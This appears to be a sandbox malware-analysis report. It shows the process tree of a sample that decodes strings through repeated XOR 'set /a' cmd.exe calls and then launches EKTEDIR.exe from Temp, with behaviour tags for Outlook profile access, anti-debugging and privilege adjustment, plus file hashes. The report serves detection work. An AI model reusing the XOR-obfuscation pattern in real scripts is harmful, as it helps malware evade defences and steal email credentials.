C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:1564
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:1276
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "135^177"2⤵PID:4068
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "134^177"2⤵PID:436
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "134^177"2⤵PID:3796
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:3684
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:396
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:1048
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:3692
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:2692
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:5072
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:2104
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:3464
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4004
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:1540
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "152^177"2⤵PID:2312
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:4644
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "159^177"2⤵PID:1868
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:3388
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "130^177"2⤵PID:2108
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "141^177"2⤵PID:1880
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "250^177"2⤵PID:4968
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "244^177"2⤵PID:3248
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "227^177"2⤵PID:2904
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "255^177"2⤵PID:1508
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "244^177"2⤵PID:4340
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "253^177"2⤵PID:1520
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "130^177"2⤵PID:3808
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "131^177"2⤵PID:1588
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "139^177"2⤵PID:3504
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "139^177"2⤵PID:212
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "227^177"2⤵PID:1904
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "212^177"2⤵PID:3508
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "208^177"2⤵PID:804
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "213^177"2⤵PID:3844
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "247^177"2⤵PID:1240
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:1996
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "221^177"2⤵PID:2768
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "212^177"2⤵PID:384
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "153^177"2⤵PID:1784
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:1324
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4360
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:1344
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "132^177"2⤵PID:2832
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:5104
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4560
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:5084
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:3740
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:3260
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "128^177"2⤵PID:4588
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:4032
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4488
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:4464
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:1900
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "133^177"2⤵PID:5016
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "132^177"2⤵PID:2772
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "135^177"2⤵PID:4568
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "128^177"2⤵PID:2456
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "134^177"2⤵PID:5052
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "128^177"2⤵PID:1184
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "132^177"2⤵PID:4056
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "131^177"2⤵PID:3568
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:3588
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "155^177"2⤵PID:876
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:3460
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:4384
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:3508
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:3424
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:508
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:1328
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:532
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:1840
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "152^177"2⤵PID:1468
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:960
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "159^177"2⤵PID:3980
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:3068
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "130^177"2⤵PID:4176
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "141^177"2⤵PID:3536
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "196^177"2⤵PID:4652
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "194^177"2⤵PID:1332
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "212^177"2⤵PID:4132
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:2288
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "130^177"2⤵PID:1400
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "131^177"2⤵PID:3508
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "139^177"2⤵PID:4488
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "139^177"2⤵PID:5004
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "242^177"2⤵PID:4880
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "208^177"2⤵PID:2892
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "221^177"2⤵PID:1840
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "221^177"2⤵PID:436
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "230^177"2⤵PID:3636
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:1984
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "223^177"2⤵PID:2280
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "213^177"2⤵PID:3852
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "222^177"2⤵PID:800
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "198^177"2⤵PID:376
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "225^177"2⤵PID:2700
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:3464
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "222^177"2⤵PID:1904
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "210^177"2⤵PID:4384
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "240^177"2⤵PID:548
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "153^177"2⤵PID:3424
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:2628
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:1240
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "195^177"2⤵PID:4324
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "128^177"2⤵PID:3704
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:1340
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:760
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:4360
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:2268
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:4788
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:3808
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:5040
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:1376
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:948
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:1684
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:2172
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:1184
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:3316
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:1392
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "157^177"2⤵PID:4488
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:2744
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "216^177"2⤵PID:1524
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "145^177"2⤵PID:3544
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "129^177"2⤵PID:1604
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "152^177"2⤵PID:2456
-
C:\Windows\SysWOW64\cmd.execmd.exe /c set /a "141^177"2⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\EKTEDIR.exe"C:\Users\Admin\AppData\Local\Temp\EKTEDIR.exe"2⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2124
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3060,i,7252135083366563450,1411796122645726339,262144 --variations-seed-version --mojo-platform-channel-handle=4604 /prefetch:81⤵PID:2896
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD54d3b19a81bd51f8ce44b93643a4e3a99
SHA135f8b00e85577b014080df98bd2c378351d9b3e9
SHA256fda0018ab182ac6025d2fc9a2efcce3745d1da21ce5141859f8286cf319a52ce
SHA512b2ba9c961c0e1617f802990587a9000979ab5cc493ae2f8ca852eb43eeaf24916b0b29057dbff7d41a1797dfb2dce3db41990e8639b8f205771dbec3fd80f622
-
Filesize
6KB
MD53eb4cd50dcb9f5981f5408578cb7fb70
SHA113b38cc104ba6ee22dc4dfa6e480e36587f4bc71
SHA2561c2f19e57dc72587aa00800a498c5f581b7d6761dc13b24bcf287ea7bd5ca2bf
SHA5125a0c9d28df7a77e157046dce876282c48f434a441ee34e12b88f55be31be536eff676f580adbe4586da3f1519f94b5793ccbb3068b4b009eee286c0c5135d324